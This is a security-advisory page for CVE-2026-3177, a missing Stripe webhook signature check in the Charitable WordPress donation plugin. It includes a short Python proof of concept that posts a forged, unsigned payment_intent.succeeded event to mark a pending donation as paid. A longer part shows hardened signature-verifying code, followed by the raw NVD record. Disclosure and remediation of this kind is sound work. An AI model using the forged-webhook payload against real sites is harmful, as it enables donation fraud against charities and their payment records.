Security Vulnerability Report
CVE-2026-3177 CVSS 5.3 MEDIUM

CVE-2026-3177

Published: 2026-04-07 08:16:11
Last Modified: 2026-04-27 19:04:23

Description

The Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 1.8.9.7. This is due to missing cryptographic verification of incoming Stripe webhook events. This makes it possible for unauthenticated attackers to forge payment_intent.succeeded webhook payloads and mark pending donations as completed without a real payment.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is present in the NVD record. Affected product per the advisory text:

Charitable – Donation Plugin for WordPress <= 1.8.9.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json

import requests

# Target URL of the vulnerable WordPress plugin's webhook endpoint.
# The route path is the PoC author's assumption; confirm the REST route that
# the installed plugin version actually registers before testing.
target_url = "http://target-site.com/wp-json/charitable/v1/stripe/webhook"

# Malicious payload mimicking a successful Stripe payment event.
# 'donation_id' corresponds to the ID of a pending donation in the
# WordPress database.
payload = {
    "id": "evt_fake_webhook_id_12345",
    "type": "payment_intent.succeeded",
    "data": {
        "object": {
            "id": "pi_fake_payment_intent",
            "metadata": {"donation_id": "123"},
            "status": "succeeded",
            "amount": 5000,
        }
    },
}

headers = {
    "Content-Type": "application/json"
    # Note: no Stripe-Signature header is sent. The vulnerable version does
    # not verify it, so the unsigned event is accepted as genuine.
}

try:
    response = requests.post(target_url, data=json.dumps(payload), headers=headers)
    if response.status_code == 200:
        print("[+] Webhook sent successfully. Donation potentially marked as completed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")
```
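The check the vulnerable version lacks, as an added example that is not part of this advisory and not the plugin's own code: a receiver that verifies the Stripe-Signature header before acting on an event. It re-implements Stripe's documented scheme (HMAC-SHA256 over `<timestamp>.<raw body>` keyed with the endpoint signing secret, hex-encoded, sent as `t=<ts>,v1=<hex>`), rejects stale timestamps, and only then reads `payment_intent.succeeded`. The secret value, the handler name and return shape, and the 300-second tolerance (which mirrors the default in Stripe's SDKs) are this example's assumptions; the payload is a constructed copy of the forged event from the PoC above. The plugin's actual fix is not reproduced here.

```python
import hashlib
import hmac
import json
import time

# Constructed secret for the demo; a real one is issued per endpoint in the
# Stripe dashboard and starts with "whsec_".
ENDPOINT_SECRET = "whsec_example_secret_for_demo_only"

# Replay window in seconds; 300 mirrors the default tolerance in Stripe's SDKs.
DEFAULT_TOLERANCE = 300

# Constructed copy of the forged event from the PoC (no real payment behind it).
FORGED_EVENT = {
    "id": "evt_fake_webhook_id_12345",
    "type": "payment_intent.succeeded",
    "data": {"object": {"id": "pi_fake_payment_intent",
                        "metadata": {"donation_id": "123"},
                        "status": "succeeded", "amount": 5000}},
}


def compute_signature(raw_body, secret, timestamp):
    """HMAC-SHA256(secret, "<timestamp>.<raw_body>") as lowercase hex."""
    signed_payload = str(timestamp).encode() + b"." + raw_body
    return hmac.new(secret.encode(), signed_payload, hashlib.sha256).hexdigest()


def build_signature_header(raw_body, secret, timestamp):
    """Produce the header Stripe would send; used here only to simulate Stripe."""
    return f"t={timestamp},v1={compute_signature(raw_body, secret, timestamp)}"


def parse_signature_header(header):
    """Return (timestamp, [v1 signatures]); (None, []) if the header is malformed."""
    timestamp, signatures = None, []
    for item in header.split(","):
        key, sep, value = item.strip().partition("=")
        if not sep:
            return None, []
        if key == "t":
            if not value.isdigit():
                return None, []
            timestamp = int(value)
        elif key == "v1":
            signatures.append(value)
        # Other scheme versions (e.g. "v0") are ignored, as Stripe specifies.
    return timestamp, signatures


def verify_stripe_signature(raw_body, header, secret,
                            tolerance=DEFAULT_TOLERANCE, now=None):
    """True only if some v1 signature matches and the timestamp is fresh."""
    if not header:
        return False
    timestamp, signatures = parse_signature_header(header)
    if timestamp is None or not signatures:
        return False
    now = int(time.time()) if now is None else now
    if abs(now - timestamp) > tolerance:        # stale or replayed event
        return False
    expected = compute_signature(raw_body, secret, timestamp).encode()
    # Constant-time compare; several v1 values appear during secret rotation.
    return any(hmac.compare_digest(expected, sig.encode()) for sig in signatures)


def handle_webhook(raw_body, header, secret, now=None):
    """Hardened handler: returns the donation_id it would mark completed, or None.

    Status codes and the return shape are this example's conventions only.
    """
    if not verify_stripe_signature(raw_body, header, secret, now=now):
        return {"status": 400, "completed": None}
    event = json.loads(raw_body)
    if event.get("type") != "payment_intent.succeeded":
        return {"status": 200, "completed": None}
    donation_id = event["data"]["object"]["metadata"].get("donation_id")
    return {"status": 200, "completed": donation_id}


def demo(now=1_700_000_000):
    """Run the forged payload unsigned, genuinely signed, tampered, and stale."""
    body = json.dumps(FORGED_EVENT).encode()
    header = build_signature_header(body, ENDPOINT_SECRET, now)
    return {
        "unsigned": handle_webhook(body, None, ENDPOINT_SECRET, now=now),
        "signed": handle_webhook(body, header, ENDPOINT_SECRET, now=now),
        "tampered": handle_webhook(body + b" ", header, ENDPOINT_SECRET, now=now),
        "stale": handle_webhook(body, header, ENDPOINT_SECRET, now=now + 301),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:9s} -> {result}")
```

The signature must be computed over the raw request body exactly as received; re-serialising the parsed JSON changes whitespace and key order and breaks the HMAC. Authenticity alone is also not sufficient for a payment flow: a receiver should still reconcile `amount` and currency against the pending donation record and ignore event IDs it has already processed, otherwise a legitimately signed event for a small payment could be replayed or pointed at a different `donation_id`.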

References

https://plugins.trac.wordpress.org/changeset/3485023/charitable (plugin changeset on plugins.trac.wordpress.org)
https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?source=cve (Wordfence advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-3177",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T08:16:11.090",
    "lastModified": "2026-04-27T19:04:22.650",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 1.8.9.7. This is due to missing cryptographic verification of incoming Stripe webhook events. This makes it possible for unauthenticated attackers to forge payment_intent.succeeded webhook payloads and mark pending donations as completed without a real payment."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-345"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3485023/charitable",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```